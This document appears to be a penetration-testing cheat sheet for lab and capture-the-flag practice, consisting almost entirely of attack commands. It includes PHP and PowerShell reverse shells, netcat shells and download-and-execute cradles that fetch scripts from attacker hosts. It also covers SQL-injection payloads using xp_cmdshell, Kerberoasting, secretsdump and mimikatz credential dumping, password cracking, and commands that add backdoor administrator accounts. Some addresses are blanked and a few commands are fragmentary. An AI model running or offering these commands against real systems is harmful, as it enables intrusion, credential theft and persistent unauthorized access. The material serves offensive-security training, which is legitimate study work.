(Bad Characters: 0x00, 0x0A)
- Fuzzing
- Finding eip position
- Finding bad chars
- Locating jmp esp
- Generating payload with msfvenom
- Getting reverse shell with netcat
- host -t axfr HTB.local
- host -l HTB.local
- host -l
- dig @ axfr
#Wget Transfer How to retrieve file(s) from host (inside a reverse shell)
1. Place file you want transferred in /var/www/html/
2. # service apache2 start
3. # wget http://10.10.10/pspy64 <- for single file
4. # wget -r <- for folder
#TFTP Transfer (How to transfer from Kali to Windows) Using MSF. Start MSF before starting these steps:
1. use auxiliary/server/tftp
2. set TFTPROOT /usr/share/mimikatz/Win32/
3. run
4. tftp -i GET mimikatz.exe
#NC (Windows to Kali)
1. nc -nv 4444 < bank-account.zip
2. nc -nlvp 4444 > bank-account.zip
1. Invoke-WebRequest -Uri -OutFile C:\Users\Victim\exploit.py
Without an interactive powershell session:
1. Create wget.ps1
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
local system:
1. cat exploit.py | base64
2. echo "base64string==" | base64 -d >> exploit.py
local system (either python2/3):
1. python -m SimpleHTTPServer 80
1b. python3 -m http.server 80
2. certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip
- GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>
- powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
- impacket-secretsdump -just-dc-ntlm /@<DOMAIN_CONTROLLER> -outputfile filename.hashes
- _<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
- _<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
- Refer to LFI / RFI section at the top of the page ^^
- EXEC master..xp_cmdshell 'whoami';
- meh' exec master..xp_cmdshell 'whoami' --
- user:$1$AbCdEf123/:16903:0:99999:7:::
- hashcat -m 500 -a 0 -o cracked_password.txt --force MD5_hash.txt /usr/share/wordlists/rockyou.txt
- user:$1$AbCdEf123/:16903:0:99999:7:::
- john --rules --wordlist=/usr/share/wordlists/rockyou.txt MD5_hash.txt
- non staged = netcat
- staged = multi/handler
- grep -Ri 'password' .
- find / -perm –4000 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} ;
- which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null (then ls -la, look for 777 file permissions).
- churrasco -d "net user /add "
- churrasco -d "net localgroup administrators /add"
- churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"
- Mimikatz.exe (run it)
- privilege::debug
- sekurlsa::logonpasswords
- ssh root@ -R 1234:
- reconnoitre -t -o . --services --quick --hostnames
- nmap -vvv -sC -sV -p- --min-rate 2000
- nmap -sT -p 22,80,110 -A
- nmap -p- -iL ips.txt > TCP_Ports.txt
#UDP (can take hours so maybe netstat is a better alternative)
- nmap -sU --top-ports 10000
- nmap -sT -sU -p 22,80,110 -A
- nmap -sT -sU -p- --min-rate 2000
- nmap -p- -sU -iL ips.txt > udp.txt
- nmap -sU -sV -iL ips.txt > alludpports.txt
#SNMP nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)
#SSH nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt
#SSL nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt
- powershell -ExecutionPolicy ByPass -File script.ps1
- sshuttle -r user@
rdesktop -u user -p password -g 85% -r disk:share=/root/
- nc [YourIPaddr] [port] –e cmd.exe
- python -c 'import pty;spawn("/bin/bash");'
- In reverse shell:
python -c 'import pty; pty.spawn("/bin/bash")'
- In Kali
3. stty raw -echo
4. fg
- In reverse shell
5. reset (sometimes optional)
6. export SHELL=bash
7. export TERM=xterm-256color
8. stty rows <num> columns <cols> (optional)
- perl -e 'exec "/bin/sh";'
- perl: exec "/bin/sh";
/bin/sh -i
Linux netstat syntax
- netstat -tulpn | grep LISTEN
FreeBSD/MacOS X netstat syntax
- netstat -anp tcp | grep LISTEN
- netstat -anp udp | grep LISTEN
OpenBSD netstat syntax
- netstat -na -f inet | grep LISTEN
- netstat -nat | grep LISTEN
Nmap scan syntax
- sudo nmap -sT -O localhost
- sudo nmap -sU -O ##[ list open UDP ports ]##
- sudo nmap -sT -O ##[ list open TCP ports ]##
- smbmap -H
- smbclient -L
- smbclient //$
- Impacket's PSEXEC (After creating a remote port fwd) /usr/share/doc/python-impacket/examples/psexec.py user@
Password: (password)
[*] Trying protocol 445/SMB...
- Impacket's SMBServer (For File Transfer)
- cd /usr/share/windows-binaries
- python /usr/share/doc/python-impacket/examples/smbserver.py a .
- \\\a\mimikatz.exe
- systemctl restart open-vm-tools.service
- python -m SimpleHTTPServer 80
- python3 -m http.server 80
- ngrok http 80
#Web Scanning with extensions
Linux (Example web server might be Apache)
gobuster -e -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
Windows (Example web server might be IIS)
gobuster -e -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
Linux (Example web server might be Apache)
python3 dirsearch.py -r -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
Windows (Example web server might be IIS)
python3 dirsearch.py -r -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
- gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
- gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69
- gobuster -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
- nikto -h -p 80
#Nikto HTTPS
- nikto -h -p 443
- wfuzz -u http://google.com/login.php?username=admin&password=FUZZ -w /usr/share/wordlists/rockyou.txt
- wfuzz -u -w /usr/share/wfuzz/wordlist/general/common.txt
- Reverse Powershell: (sometimes powershell or echo may need to be infront of the string and sometimes quotes may be needed, e.g. powershell IEX or powershell "IEX..etc" or echo IEX).
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- If one has a Command Prompt shell, this will grab PowerUp from a local web server and run it on the compromised shell:
echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -
IEX(New-object Net.WebClient).DownloadString('')
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"
- Reverse Powershell using mssql:
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"\")
- net user
- net localgroup Users
- net localgroup Administrators
- net user USERNAME NEWPASS /add
- net user "USER NAME" NEWPASS /add
- net localgroup administrators USERNAME /add